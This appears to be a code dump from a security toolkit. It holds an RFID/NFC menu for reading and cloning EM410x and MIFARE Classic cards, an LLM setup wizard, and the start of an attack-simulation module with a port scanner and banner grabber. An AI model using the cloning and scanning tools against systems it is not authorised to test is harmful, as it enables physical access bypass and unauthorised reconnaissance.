    # ── NFC Operations (via libnfc) ──────────────────────────────────────
    def nfc_scan(self) -> Dict:
        """Scan for NFC tags using libnfc.

        Parses UID lines from `nfc-list` output; returns found tags and count.
        """
        if not self.nfc_list:
            return {'ok': False, 'error': 'nfc-list not found (install libnfc)'}
        try:
            result = subprocess.run(
                [self.nfc_list], capture_output=True, text=True, timeout=10
            )
            tags = []
            for line in result.stdout.splitlines():
                uid_match = re.search(r'UID.*?:\s*([A-Fa-f0-9\s:]+)', line, re.I)
                if uid_match:
                    tags.append({
                        'uid': uid_match.group(1).replace(' ', '').replace(':', ''),
                        'raw': line.strip()
                    })
            return {'ok': True, 'tags': tags, 'count': len(tags)}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    # ── Card Database ────────────────────────────────────────────────────
    def save_card(self, card: Dict, name: str = None) -> Dict:
        """Save card data to database."""
        card['saved_at'] = datetime.now(timezone.utc).isoformat()
        card['display_name'] = name or card.get('name', 'Unknown Card')
        # Remove raw output to save space
        card.pop('raw_output', None)
        self.cards.append(card)
        self._save_cards()
        return {'ok': True, 'count': len(self.cards)}
    def get_saved_cards(self) -> List[Dict]:
        """List saved cards."""
        return self.cards
    def delete_card(self, index: int) -> Dict:
        """Delete saved card by index."""
        if 0 <= index < len(self.cards):
            self.cards.pop(index)
            self._save_cards()
            return {'ok': True}
        return {'ok': False, 'error': 'Invalid index'}
    def _save_cards(self):
        # Persist the whole card list to cards.json.
        cards_file = os.path.join(self.data_dir, 'cards.json')
        with open(cards_file, 'w') as f:
            json.dump(self.cards, f, indent=2)
    def _load_cards(self):
        # Best-effort load; a missing or corrupt file leaves self.cards as-is.
        cards_file = os.path.join(self.data_dir, 'cards.json')
        if os.path.exists(cards_file):
            try:
                with open(cards_file) as f:
                    self.cards = json.load(f)
            except Exception:
                pass
    def list_dumps(self) -> List[Dict]:
        """List saved card dumps."""
        dumps = []
        for f in Path(self.dumps_dir).iterdir():
            if f.is_file():
                dumps.append({
                    'name': f.name, 'path': str(f),
                    'size': f.stat().st_size,
                    'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
                })
        return dumps
    def get_default_keys(self) -> List[str]:
        """Return common MIFARE default keys."""
        return MIFARE_DEFAULT_KEYS
    def get_card_types(self) -> Dict:
        """Return supported card type info."""
        return CARD_TYPES
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None

def get_rfid_manager() -> RFIDManager:
    """Return the shared RFIDManager, creating it and loading cards once."""
    global _instance
    if _instance is None:
        manager = RFIDManager()
        manager._load_cards()
        _instance = manager
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for RFID/NFC module.

    Text-menu loop over the RFIDManager singleton: LF/HF searches, EM410x
    read/clone, MIFARE dump/clone, libnfc scans, and the saved-card/dump
    listings. Loops until the user selects 0.
    """
    mgr = get_rfid_manager()
    while True:
        tools = mgr.get_tools_status()
        print(f"\n{'='*60}")
        print(f" RFID / NFC Tools")
        print(f"{'='*60}")
        print(f" Proxmark3: {'OK' if tools['proxmark3'] else 'NOT FOUND'}")
        print(f" libnfc: {'OK' if tools['nfc-list'] else 'NOT FOUND'}")
        print(f" Saved cards: {tools['saved_cards']}")
        print()
        print(" 1 — LF Search (125 kHz)")
        print(" 2 — HF Search (13.56 MHz)")
        print(" 3 — Read EM410x")
        print(" 4 — Clone EM410x to T5577")
        print(" 5 — Dump MIFARE Classic")
        print(" 6 — Clone MIFARE from Dump")
        print(" 7 — NFC Scan (libnfc)")
        print(" 8 — Saved Cards")
        print(" 9 — Card Dumps")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            result = mgr.lf_search()
            if result['ok']:
                c = result['card']
                print(f" Found: {c.get('name', '?')} ID: {c.get('id', '?')}")
            else:
                print(f" {result.get('error', 'No card found')}")
        elif choice == '2':
            result = mgr.hf_search()
            if result['ok']:
                c = result['card']
                print(f" Found: {c.get('name', '?')} UID: {c.get('uid', '?')}")
            else:
                print(f" {result.get('error', 'No card found')}")
        elif choice == '3':
            result = mgr.lf_read_em410x()
            if result['ok']:
                print(f" EM410x ID: {result['card']['id']}")
                save = input(" Save card? (y/n): ").strip()
                if save.lower() == 'y':
                    mgr.save_card(result['card'])
            else:
                print(f" {result['error']}")
        elif choice == '4':
            card_id = input(" EM410x ID to clone: ").strip()
            if card_id:
                result = mgr.lf_clone_em410x(card_id)
                print(f" {result.get('message', result.get('error'))}")
        elif choice == '5':
            result = mgr.hf_dump_mifare()
            if result['ok']:
                print(f" {result['message']}")
                if 'keys_found' in result:
                    for k in result['keys_found']:
                        print(f" Key: {k}")
            else:
                print(f" {result['error']}")
        elif choice == '6':
            dump = input(" Dump file path: ").strip()
            if dump:
                result = mgr.hf_clone_mifare(dump)
                print(f" {result['message']}")
        elif choice == '7':
            result = mgr.nfc_scan()
            if result['ok']:
                print(f" Found {result['count']} tags:")
                for t in result['tags']:
                    print(f" UID: {t['uid']}")
            else:
                print(f" {result['error']}")
        elif choice == '8':
            cards = mgr.get_saved_cards()
            for i, c in enumerate(cards):
                print(f" [{i}] {c.get('display_name', '?')} — "
                      f"{c.get('type', '?')} ID={c.get('id', c.get('uid', '?'))}")
        elif choice == '9':
            for d in mgr.list_dumps():
                print(f" {d['name']} ({d['size']} bytes)")

1031
modules/rsf.py Normal file

File diff suppressed because it is too large Load Diff

2091
modules/sdr_tools.py Normal file

File diff suppressed because it is too large Load Diff

558
modules/setup.py Normal file
View File

@@ -0,0 +1,558 @@
"""
AUTARCH Setup Module
First-time configuration wizard for LLM settings
Supports GGUF (llama.cpp) and SafeTensors (transformers) models
"""
import os
import sys
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.config import get_config
from core.banner import Colors, clear_screen, display_banner
class SetupWizard:
"""Interactive setup wizard for AUTARCH configuration."""
def __init__(self):
    """Create the wizard and bind the shared AUTARCH config object."""
    self.config = get_config()
def print_header(self, text: str):
    """Render a cyan/bold section header followed by a dim separator line."""
    header = f"\n{Colors.CYAN}{Colors.BOLD}[*] {text}{Colors.RESET}"
    # NOTE(review): '' * 60 produces an empty separator — a box-drawing glyph
    # may have been lost in extraction; confirm against the original file.
    separator = f"{Colors.DIM}{'' * 60}{Colors.RESET}"
    print(header)
    print(separator)
def print_info(self, text: str):
    """Print *text* as a green informational line."""
    line = f"{Colors.GREEN} {text}{Colors.RESET}"
    print(line)
def print_warning(self, text: str):
    """Print *text* as a yellow [!] warning line."""
    line = f"{Colors.YELLOW}[!] {text}{Colors.RESET}"
    print(line)
def print_error(self, text: str):
    """Print *text* as a red [X] error line."""
    line = f"{Colors.RED}[X] {text}{Colors.RESET}"
    print(line)
def get_input(self, prompt: str, default: str = None) -> str:
    """Prompt the user and return their input, falling back to *default*.

    Args:
        prompt: The prompt to display.
        default: Value returned on empty input or interrupt (may be None).

    Returns:
        Stripped user input, or *default* when input is empty or aborted
        (EOF / Ctrl-C).
    """
    if default:
        text = f"{Colors.WHITE} {prompt} [{Colors.YELLOW}{default}{Colors.WHITE}]: {Colors.RESET}"
    else:
        text = f"{Colors.WHITE} {prompt}: {Colors.RESET}"
    try:
        answer = input(text).strip()
    except (EOFError, KeyboardInterrupt):
        print()
        return default
    return answer or default
def get_int_input(self, prompt: str, default: int, min_val: int = None, max_val: int = None) -> int:
    """Prompt repeatedly until a valid integer within [min_val, max_val] is given.

    Args:
        prompt: The prompt to display.
        default: Default value offered to the user.
        min_val: Minimum allowed value (inclusive), or None for no bound.
        max_val: Maximum allowed value (inclusive), or None for no bound.

    Returns:
        The validated integer.
    """
    while True:
        raw = self.get_input(prompt, str(default))
        try:
            candidate = int(raw)
        except ValueError:
            self.print_error("Please enter a valid number")
            continue
        if min_val is not None and candidate < min_val:
            self.print_error(f"Value must be at least {min_val}")
        elif max_val is not None and candidate > max_val:
            self.print_error(f"Value must be at most {max_val}")
        else:
            return candidate
def get_float_input(self, prompt: str, default: float, min_val: float = None, max_val: float = None) -> float:
    """Prompt repeatedly until a valid float within [min_val, max_val] is given."""
    while True:
        raw = self.get_input(prompt, str(default))
        try:
            candidate = float(raw)
        except ValueError:
            self.print_error("Please enter a valid number")
            continue
        if min_val is not None and candidate < min_val:
            self.print_error(f"Value must be at least {min_val}")
        elif max_val is not None and candidate > max_val:
            self.print_error(f"Value must be at most {max_val}")
        else:
            return candidate
def validate_model_path(self, path: str) -> tuple:
    """Check whether *path* points to a usable model.

    Args:
        path: Candidate model file or directory path.

    Returns:
        Tuple (is_valid, model_type) where model_type is 'gguf',
        'transformers', or None.
    """
    if not path:
        return False, None
    resolved = Path(os.path.expanduser(path))
    try:
        if not resolved.exists():
            return False, None
    except (PermissionError, OSError):
        return False, None
    if resolved.is_file():
        # A .gguf extension or a GGUF magic header marks a llama.cpp model.
        if resolved.suffix.lower() == '.gguf':
            return True, 'gguf'
        try:
            with open(resolved, 'rb') as fh:
                if fh.read(4) == b'GGUF':
                    return True, 'gguf'
        except Exception:
            pass
        # Any other plain file is still handed to llama.cpp as-is.
        return True, 'gguf'
    if resolved.is_dir():
        config_file = resolved / "config.json"
        # SafeTensors weights (sharded or single-file) => transformers.
        if list(resolved.glob("*.safetensors")) or (resolved / "model.safetensors.index.json").exists():
            return True, 'transformers'
        # PyTorch .bin weights alongside config.json also count.
        if config_file.exists() and (list(resolved.glob("*.bin")) or (resolved / "pytorch_model.bin").exists()):
            return True, 'transformers'
        # A bare config.json is accepted as a transformers directory.
        if config_file.exists():
            return True, 'transformers'
    return False, None
def validate_model_path_legacy(self, path: str) -> bool:
    """Legacy validation: True when *path* names an existing file or directory.

    Args:
        path: Path to the model file or directory.

    Returns:
        True if the (~-expanded) path exists, False otherwise.
    """
    if not path:
        return False
    expanded = os.path.expanduser(path)
    return os.path.isfile(expanded) or os.path.isdir(expanded)
def _is_huggingface_id(self, path: str) -> bool:
"""Check if the path looks like a HuggingFace model ID.
HuggingFace model IDs are in format 'org/model-name' or 'username/model-name'.
Args:
path: The path/ID to check
Returns:
True if it looks like a HuggingFace model ID
"""
if not path:
return False
# Must contain exactly one '/' and not start with '/'
# Also should not contain path separators like '\' or multiple '/'
if path.startswith('/') or path.startswith('\\'):
return False
parts = path.split('/')
if len(parts) == 2 and all(p and not p.startswith('.') for p in parts):
# Looks like org/model-name format
return True
return False
def resolve_model_path(self, path: str) -> str:
    """Try several interpretations of *path*; return the first that exists.

    Candidates are probed in order: the literal path, ~-expansion,
    framework-relative variants, a repair for paths missing the home
    prefix before 'dh_framework', and finally the bare filename under
    the models/ subdirectory.

    Args:
        path: User-provided path (may be relative or have variations).

    Returns:
        Resolved absolute path string if found, None otherwise.
    """
    from core.paths import get_app_dir
    framework_dir = get_app_dir()
    candidates = [
        Path(path),                        # as given
        Path(path).expanduser(),           # expand ~
        framework_dir / path.lstrip('/'),  # relative to framework dir
        framework_dir / path,              # relative, leading '/' kept
    ]
    # Repair /dh_framework/... paths that lost their /home/<user> prefix.
    if path.startswith('/dh_framework'):
        candidates.append(framework_dir / path[len('/dh_framework/'):])
    if path.startswith('dh_framework'):
        candidates.append(framework_dir / path[len('dh_framework/'):])
    # Last resort: look for the bare filename under models/.
    candidates.append(framework_dir / 'models' / Path(path).name)
    for candidate in candidates:
        try:
            if candidate.exists():
                return str(candidate.resolve())
        except (PermissionError, OSError):
            continue
    return None
def skip_setup(self) -> bool:
    """Skip setup and mark as complete without LLM configuration.

    Lists which modules remain usable without a model, persists the
    "setup complete" flag, and waits for the user to acknowledge.

    Returns:
        True always (setup skipped successfully)
    """
    clear_screen()
    display_banner()
    self.print_header("Setup Skipped")
    print(f"\n{Colors.WHITE} AUTARCH will run without LLM features.{Colors.RESET}")
    print(f"{Colors.DIM} The following modules will still work:{Colors.RESET}")
    print(f"{Colors.GREEN} - defender (Defense){Colors.RESET}")
    print(f"{Colors.GREEN} - counter (Counter){Colors.RESET}")
    print(f"{Colors.GREEN} - analyze (Analyze){Colors.RESET}")
    print(f"{Colors.GREEN} - recon (OSINT){Colors.RESET}")
    print(f"{Colors.GREEN} - adultscan (OSINT){Colors.RESET}")
    print(f"{Colors.GREEN} - simulate (Simulate){Colors.RESET}")
    print(f"{Colors.GREEN} - msf (Offense){Colors.RESET}")
    print()
    print(f"{Colors.YELLOW} LLM-dependent modules (chat, agent) will not work{Colors.RESET}")
    print(f"{Colors.YELLOW} until you configure a model with --setup{Colors.RESET}")
    print()
    # Persist the flag so the wizard does not run again on next launch.
    self.config.mark_setup_complete()
    self.print_info(f"Configuration saved to: {self.config.config_path}")
    print(f"\n{Colors.WHITE} Press Enter to continue...{Colors.RESET}")
    try:
        input()
    except (EOFError, KeyboardInterrupt):
        pass
    return True
def run(self, allow_skip: bool = True) -> bool:
    """Run the setup wizard.

    Flow: optional skip prompt → model path/ID selection loop →
    backend-specific settings (llama.cpp or transformers) → save and
    show a summary.

    Args:
        allow_skip: Whether to show the skip option

    Returns:
        True if setup completed successfully, False if cancelled
    """
    clear_screen()
    display_banner()
    self.print_header("AUTARCH First-Time Setup")
    print(f"\n{Colors.WHITE} Welcome to AUTARCH! This wizard will help you configure")
    print(f" the LLM settings for your system.{Colors.RESET}\n")
    # Offer skip option
    if allow_skip:
        print(f"{Colors.DIM} Many modules work without an LLM (OSINT, forensics, etc.){Colors.RESET}")
        print()
        print(f" {Colors.GREEN}[1]{Colors.RESET} Configure LLM (for chat & agent features)")
        print(f" {Colors.YELLOW}[2]{Colors.RESET} Skip setup (use without LLM)")
        print()
        choice = self.get_input("Select option", "1")
        if choice == "2":
            return self.skip_setup()
    # Model Path Configuration
    self.print_header("Model Configuration")
    self.print_info("AUTARCH supports two model formats:")
    print(f" {Colors.CYAN}GGUF{Colors.RESET} - Single file models for llama.cpp (recommended for CPU)")
    print(f" {Colors.CYAN}SafeTensors{Colors.RESET} - HuggingFace models for transformers (GPU optimized)")
    print()
    self.print_info("Enter a local path OR a HuggingFace model ID.")
    self.print_info("Examples:")
    print(f" {Colors.DIM}GGUF: /home/user/models/llama-7b.gguf{Colors.RESET}")
    print(f" {Colors.DIM}SafeTensors: /home/user/models/Lily-Cybersecurity-7B{Colors.RESET}")
    print(f" {Colors.DIM}HuggingFace ID: segolilylabs/Lily-Cybersecurity-7B-v0.2{Colors.RESET}")
    # 'gguf', 'transformers', or None when the user continues without a model.
    model_type = None
    while True:
        # Get current configured path for default
        current_gguf = self.config.get('llama', 'model_path', '')
        current_transformers = self.config.get('transformers', 'model_path', '')
        default_path = current_gguf or current_transformers or ''
        model_path = self.get_input("Model path", default_path if default_path else None)
        if model_path:
            # Strip quotes that users might accidentally include
            model_path = model_path.strip().strip('"').strip("'")
            model_path = os.path.expanduser(model_path)
            # Try to resolve the path (handles relative paths, /dh_framework/... etc.)
            resolved_path = self.resolve_model_path(model_path)
            if resolved_path:
                model_path = resolved_path
            is_valid, detected_type = self.validate_model_path(model_path)
            if is_valid and detected_type:
                model_type = detected_type
                if model_type == 'gguf':
                    self.config.set('llama', 'model_path', model_path)
                    self.config.set('autarch', 'llm_backend', 'local')
                    self.print_info(f"GGUF model found: {os.path.basename(model_path)}")
                else: # transformers
                    self.config.set('transformers', 'model_path', model_path)
                    self.config.set('autarch', 'llm_backend', 'transformers')
                    self.print_info(f"SafeTensors model found: {os.path.basename(model_path)}")
                break
            elif self._is_huggingface_id(model_path):
                # Looks like a HuggingFace model ID (e.g., 'org/model-name')
                model_type = 'transformers'
                self.config.set('transformers', 'model_path', model_path)
                self.config.set('autarch', 'llm_backend', 'transformers')
                self.print_info(f"HuggingFace model ID: {model_path}")
                self.print_info("Model will be downloaded/loaded from HuggingFace cache")
                break
            else:
                self.print_error("Model not found or unrecognized format.")
                self.print_info("For GGUF: provide path to .gguf file")
                self.print_info("For SafeTensors: provide path to model directory")
                self.print_info("For HuggingFace: use format 'org/model-name'")
                retry = self.get_input("Try again? (y/n)", "y")
                if retry.lower() != 'y':
                    self.print_warning("Setup cancelled - no model configured")
                    return False
        else:
            self.print_warning("No model path provided")
            skip = self.get_input("Continue without model? (y/n)", "n")
            if skip.lower() == 'y':
                break
            continue
    # Backend-specific configuration
    if model_type == 'gguf':
        # GGUF/llama.cpp specific settings
        self.print_header("Context Settings (llama.cpp)")
        self.print_info("Configure the context window and threading.")
        n_ctx = self.get_int_input(
            "Context size (tokens)",
            self.config.get_int('llama', 'n_ctx', 4096),
            min_val=512,
            max_val=131072
        )
        self.config.set('llama', 'n_ctx', n_ctx)
        n_threads = self.get_int_input(
            "Number of CPU threads",
            self.config.get_int('llama', 'n_threads', 4),
            min_val=1,
            max_val=256
        )
        self.config.set('llama', 'n_threads', n_threads)
        # GPU Configuration
        self.print_header("GPU Configuration")
        self.print_info("Set the number of layers to offload to GPU.")
        self.print_info("Set to 0 for CPU-only, or higher for GPU acceleration.")
        n_gpu_layers = self.get_int_input(
            "GPU layers (0 for CPU only)",
            self.config.get_int('llama', 'n_gpu_layers', 0),
            min_val=0
        )
        self.config.set('llama', 'n_gpu_layers', n_gpu_layers)
        # Generation Settings
        self.print_header("Generation Settings")
        self.print_info("Configure text generation parameters.")
        temperature = self.get_float_input(
            "Temperature (creativity)",
            self.config.get_float('llama', 'temperature', 0.7),
            min_val=0.0,
            max_val=2.0
        )
        self.config.set('llama', 'temperature', temperature)
        top_p = self.get_float_input(
            "Top P (nucleus sampling)",
            self.config.get_float('llama', 'top_p', 0.9),
            min_val=0.0,
            max_val=1.0
        )
        self.config.set('llama', 'top_p', top_p)
        top_k = self.get_int_input(
            "Top K",
            self.config.get_int('llama', 'top_k', 40),
            min_val=0
        )
        self.config.set('llama', 'top_k', top_k)
        repeat_penalty = self.get_float_input(
            "Repeat penalty",
            self.config.get_float('llama', 'repeat_penalty', 1.1),
            min_val=0.0,
            max_val=2.0
        )
        self.config.set('llama', 'repeat_penalty', repeat_penalty)
        max_tokens = self.get_int_input(
            "Max tokens per response",
            self.config.get_int('llama', 'max_tokens', 2048),
            min_val=1,
            max_val=32768
        )
        self.config.set('llama', 'max_tokens', max_tokens)
    elif model_type == 'transformers':
        # Transformers/SafeTensors specific settings
        self.print_header("Device Configuration (transformers)")
        self.print_info("Configure hardware settings for model loading.")
        print(f" {Colors.DIM}Device options: auto, cuda, cpu, mps{Colors.RESET}")
        device = self.get_input(
            "Device",
            self.config.get('transformers', 'device', 'auto')
        )
        self.config.set('transformers', 'device', device)
        # Quantization options
        self.print_header("Quantization (Memory Optimization)")
        self.print_info("Quantization reduces memory usage at the cost of some quality.")
        print(f" {Colors.DIM}Requires bitsandbytes package for 8-bit/4-bit{Colors.RESET}")
        print(f"\n {Colors.GREEN}[1]{Colors.RESET} No quantization (full precision)")
        print(f" {Colors.GREEN}[2]{Colors.RESET} 8-bit quantization (half memory)")
        print(f" {Colors.GREEN}[3]{Colors.RESET} 4-bit quantization (quarter memory)")
        quant_choice = self.get_input("Quantization option", "1")
        # 8-bit and 4-bit are mutually exclusive; both flags are always written.
        if quant_choice == "2":
            self.config.set('transformers', 'load_in_8bit', 'true')
            self.config.set('transformers', 'load_in_4bit', 'false')
        elif quant_choice == "3":
            self.config.set('transformers', 'load_in_8bit', 'false')
            self.config.set('transformers', 'load_in_4bit', 'true')
        else:
            self.config.set('transformers', 'load_in_8bit', 'false')
            self.config.set('transformers', 'load_in_4bit', 'false')
        # Generation Settings
        self.print_header("Generation Settings")
        self.print_info("Configure text generation parameters.")
        temperature = self.get_float_input(
            "Temperature (creativity)",
            self.config.get_float('transformers', 'temperature', 0.7),
            min_val=0.0,
            max_val=2.0
        )
        self.config.set('transformers', 'temperature', temperature)
        top_p = self.get_float_input(
            "Top P (nucleus sampling)",
            self.config.get_float('transformers', 'top_p', 0.9),
            min_val=0.0,
            max_val=1.0
        )
        self.config.set('transformers', 'top_p', top_p)
        top_k = self.get_int_input(
            "Top K",
            self.config.get_int('transformers', 'top_k', 40),
            min_val=0
        )
        self.config.set('transformers', 'top_k', top_k)
        repeat_penalty = self.get_float_input(
            "Repetition penalty",
            self.config.get_float('transformers', 'repetition_penalty', 1.1),
            min_val=0.0,
            max_val=2.0
        )
        self.config.set('transformers', 'repetition_penalty', repeat_penalty)
        max_tokens = self.get_int_input(
            "Max tokens per response",
            self.config.get_int('transformers', 'max_tokens', 2048),
            min_val=1,
            max_val=32768
        )
        self.config.set('transformers', 'max_tokens', max_tokens)
    # Save configuration
    self.print_header("Saving Configuration")
    self.config.mark_setup_complete()
    self.print_info(f"Configuration saved to: {self.config.config_path}")
    # Summary
    self.print_header("Setup Complete")
    print(f"\n{Colors.GREEN} AUTARCH has been configured with the following settings:{Colors.RESET}\n")
    if model_type == 'gguf':
        print(f" {Colors.YELLOW}Backend: llama.cpp (GGUF){Colors.RESET}\n")
        settings = self.config.get_llama_settings()
    elif model_type == 'transformers':
        print(f" {Colors.YELLOW}Backend: transformers (SafeTensors){Colors.RESET}\n")
        settings = self.config.get_transformers_settings()
    else:
        print(f" {Colors.YELLOW}No model configured{Colors.RESET}\n")
        settings = {}
    for key, value in settings.items():
        # Show only the filename for the model path to keep the summary short.
        if key == 'model_path' and value:
            value = os.path.basename(value)
        print(f" {Colors.CYAN}{key:20}{Colors.RESET}: {value}")
    print(f"\n{Colors.WHITE} Press Enter to continue to the main menu...{Colors.RESET}")
    try:
        input()
    except (EOFError, KeyboardInterrupt):
        pass
    return True
def run():
    """Module entry point: launch the interactive setup wizard."""
    return SetupWizard().run()
if __name__ == "__main__":
run()

652
modules/simulate.py Normal file
View File

@@ -0,0 +1,652 @@
"""
AUTARCH Simulate Module
Attack simulation and security testing
Red team exercises and controlled attack simulations.
"""
import os
import sys
import subprocess
import socket
import hashlib
import random
import string
import time
import ftplib
import base64
import urllib.request
from pathlib import Path
from datetime import datetime
# Module metadata
DESCRIPTION = "Attack simulation & red team tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "simulate"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class Simulator:
"""Attack simulation tools."""
def __init__(self):
    """No per-instance state is needed; the simulator is a bundle of tools."""
def print_status(self, message: str, status: str = "info"):
    """Print *message* with a colour and symbol keyed by *status*.

    Unknown statuses fall back to white text and a '*' marker.
    """
    palette = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
    marks = {"info": "*", "success": "+", "warning": "!", "error": "X"}
    color = palette.get(status, Colors.WHITE)
    mark = marks.get(status, '*')
    print(f"{color}[{mark}] {message}{Colors.RESET}")
def run_cmd(self, cmd: str, timeout: int = 60) -> tuple:
    """Run *cmd* through the shell and capture its output.

    Args:
        cmd: Shell command line to execute.
        timeout: Seconds to wait before giving up.

    Returns:
        Tuple (success, stdout) where success is True only when the
        command exited with status 0; stdout is stripped ('' on failure
        to launch or on timeout).
    """
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
    # Narrowed from a bare `except`: the bare form also swallowed
    # KeyboardInterrupt/SystemExit, making long commands uninterruptible.
    # SubprocessError covers TimeoutExpired; OSError covers launch failures.
    except (subprocess.SubprocessError, OSError, ValueError):
        return False, ""
    return result.returncode == 0, result.stdout.strip()
def password_audit(self):
    """Audit password strength and check common passwords.

    Interactively prompts for a password, scores it (length, character
    diversity, common/sequential/keyboard patterns), prints a strength
    verdict, and shows MD5/SHA1/SHA256 digests of the input.
    """
    print(f"\n{Colors.BOLD}Password Audit{Colors.RESET}")
    print(f"{Colors.DIM}Test password strength against common patterns{Colors.RESET}\n")
    password = input(f"{Colors.WHITE}Enter password to test: {Colors.RESET}")
    if not password:
        return
    print(f"\n{Colors.CYAN}Analyzing password...{Colors.RESET}\n")
    score = 0
    feedback = []
    # Length check — up to 3 points.
    if len(password) >= 16:
        score += 3
        feedback.append(f"{Colors.GREEN}+ Excellent length (16+){Colors.RESET}")
    elif len(password) >= 12:
        score += 2
        feedback.append(f"{Colors.GREEN}+ Good length (12+){Colors.RESET}")
    elif len(password) >= 8:
        score += 1
        feedback.append(f"{Colors.YELLOW}~ Minimum length (8+){Colors.RESET}")
    else:
        feedback.append(f"{Colors.RED}- Too short (<8){Colors.RESET}")
    # Character diversity — 1 point per class, 2 for special characters.
    has_upper = any(c.isupper() for c in password)
    has_lower = any(c.islower() for c in password)
    has_digit = any(c.isdigit() for c in password)
    has_special = any(c in '!@#$%^&*()_+-=[]{}|;:,.<>?' for c in password)
    if has_upper:
        score += 1
        feedback.append(f"{Colors.GREEN}+ Contains uppercase{Colors.RESET}")
    else:
        feedback.append(f"{Colors.RED}- No uppercase letters{Colors.RESET}")
    if has_lower:
        score += 1
        feedback.append(f"{Colors.GREEN}+ Contains lowercase{Colors.RESET}")
    else:
        feedback.append(f"{Colors.RED}- No lowercase letters{Colors.RESET}")
    if has_digit:
        score += 1
        feedback.append(f"{Colors.GREEN}+ Contains numbers{Colors.RESET}")
    else:
        feedback.append(f"{Colors.RED}- No numbers{Colors.RESET}")
    if has_special:
        score += 2
        feedback.append(f"{Colors.GREEN}+ Contains special characters{Colors.RESET}")
    else:
        feedback.append(f"{Colors.YELLOW}~ No special characters{Colors.RESET}")
    # Common passwords zero the score outright.
    common_patterns = ['password', '123456', 'qwerty', 'letmein', 'admin', 'welcome', 'monkey', 'dragon']
    if password.lower() in common_patterns:
        score = 0
        feedback.append(f"{Colors.RED}- Extremely common password!{Colors.RESET}")
    # Sequential runs of 3+ letters or digits each cost a point.
    if any(password[i:i+3].lower() in 'abcdefghijklmnopqrstuvwxyz' for i in range(len(password)-2)):
        score -= 1
        feedback.append(f"{Colors.YELLOW}~ Contains sequential letters{Colors.RESET}")
    if any(password[i:i+3] in '0123456789' for i in range(len(password)-2)):
        score -= 1
        feedback.append(f"{Colors.YELLOW}~ Contains sequential numbers{Colors.RESET}")
    # Keyboard-walk patterns cost one point (first match only).
    keyboard_patterns = ['qwerty', 'asdf', 'zxcv', '1qaz', '2wsx']
    for pattern in keyboard_patterns:
        if pattern in password.lower():
            score -= 1
            feedback.append(f"{Colors.YELLOW}~ Contains keyboard pattern{Colors.RESET}")
            break
    # Display results. The score is clamped to 0 for display only; the raw
    # (possibly negative) score drives the strength verdict below.
    for line in feedback:
        print(f" {line}")
    print(f"\n{Colors.BOLD}Score: {max(0, score)}/10{Colors.RESET}")
    if score >= 8:
        print(f"{Colors.GREEN}Strength: STRONG{Colors.RESET}")
    elif score >= 5:
        print(f"{Colors.YELLOW}Strength: MODERATE{Colors.RESET}")
    else:
        print(f"{Colors.RED}Strength: WEAK{Colors.RESET}")
    # Hash generation — digests shown for audit/lookup purposes.
    print(f"\n{Colors.CYAN}Password Hashes:{Colors.RESET}")
    print(f" MD5: {hashlib.md5(password.encode()).hexdigest()}")
    print(f" SHA1: {hashlib.sha1(password.encode()).hexdigest()}")
    print(f" SHA256: {hashlib.sha256(password.encode()).hexdigest()}")
def port_scanner(self):
    """TCP port scanner.

    Interactively prompts for a target and port range, performs a simple
    connect() scan (0.5s timeout per port), and prints open ports with a
    best-guess service name.
    """
    print(f"\n{Colors.BOLD}Port Scanner{Colors.RESET}")
    target = input(f"{Colors.WHITE}Enter target IP/hostname: {Colors.RESET}").strip()
    if not target:
        return
    port_range = input(f"{Colors.WHITE}Port range (e.g., 1-1000) [1-1024]: {Colors.RESET}").strip() or "1-1024"
    try:
        start_port, end_port = map(int, port_range.split('-'))
    except:
        self.print_status("Invalid port range", "error")
        return
    # Resolve hostname
    try:
        ip = socket.gethostbyname(target)
        if ip != target:
            print(f"\n{Colors.DIM}Resolved {target} to {ip}{Colors.RESET}")
    except:
        self.print_status(f"Could not resolve {target}", "error")
        return
    print(f"\n{Colors.CYAN}Scanning {target} ports {start_port}-{end_port}...{Colors.RESET}\n")
    open_ports = []
    scanned = 0
    total = end_port - start_port + 1
    for port in range(start_port, end_port + 1):
        scanned += 1
        # Progress line refreshed every 100 ports.
        if scanned % 100 == 0:
            print(f"\r{Colors.DIM}Progress: {scanned}/{total} ports scanned...{Colors.RESET}", end="")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.5)
        # connect_ex returns 0 on success instead of raising.
        result = sock.connect_ex((ip, port))
        if result == 0:
            open_ports.append(port)
        sock.close()
    print(f"\r{' ' * 50}\r", end="") # Clear progress line
    if open_ports:
        print(f"{Colors.GREEN}Open ports found:{Colors.RESET}\n")
        # Well-known port → service name map used for display only.
        services = {
            21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns",
            80: "http", 110: "pop3", 143: "imap", 443: "https", 445: "smb",
            3306: "mysql", 3389: "rdp", 5432: "postgresql", 8080: "http-proxy"
        }
        for port in open_ports:
            service = services.get(port, "unknown")
            print(f" {port:5}/tcp open {service}")
    else:
        print(f"{Colors.YELLOW}No open ports found in range{Colors.RESET}")
    print(f"\n{Colors.DIM}Scanned {total} ports{Colors.RESET}")
def banner_grabber(self):
    """Grab service banners.

    Connects to a single target:port, sends an HTTP HEAD for common web
    ports (otherwise just CRLF), and prints up to 15 lines of whatever
    the service sends back.
    """
    print(f"\n{Colors.BOLD}Banner Grabber{Colors.RESET}")
    target = input(f"{Colors.WHITE}Enter target IP/hostname: {Colors.RESET}").strip()
    port = input(f"{Colors.WHITE}Enter port [80]: {Colors.RESET}").strip() or "80"
    if not target:
        return
    try:
        port = int(port)
    except:
        self.print_status("Invalid port", "error")
        return
    print(f"\n{Colors.CYAN}Grabbing banner from {target}:{port}...{Colors.RESET}\n")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target, port))
        # Send HTTP request for web ports
        if port in [80, 443, 8080, 8443]:
